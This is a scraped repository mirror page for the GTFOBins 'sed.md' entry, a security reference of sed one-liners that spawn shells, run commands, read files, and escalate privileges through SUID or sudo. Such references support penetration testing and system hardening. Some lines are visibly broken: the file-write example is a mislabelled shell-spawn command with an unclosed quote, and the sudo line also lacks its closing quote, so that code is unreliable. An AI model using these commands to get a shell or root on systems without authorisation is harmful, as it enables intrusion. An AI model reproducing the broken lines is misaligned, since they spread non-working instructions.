This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-10 01:11:34 +01:00
Code
Issues
dd337b5ddf
GTFOBins.github.io
/
_gtfobins
/
sed.md
Emilio Pinna
dd337b5ddf
Adopt new function names
2018-10-05 18:55:38 +01:00
607 B
Raw
Blame
History
functions
shell
command
file-write
file-read
suid
sudo
description
code
GNU version only. Also, this requires `bash`.
sed -n '1e exec sh 1>&0' /etc/hosts
description
code
GNU version only.
sed -n "1e id" /etc/hosts
code
LFILE=file_to_write sed -n '1e exec sh 1>&0 /etc/hosts
code
LFILE=file_to_read sed '' "$LFILE"
code
LFILE=file_to_read ./sed -e '' "$LFILE"
description
code
GNU version only. Also, this requires `bash`.
sudo sed -n '1e exec sh 1>&0 /etc/hosts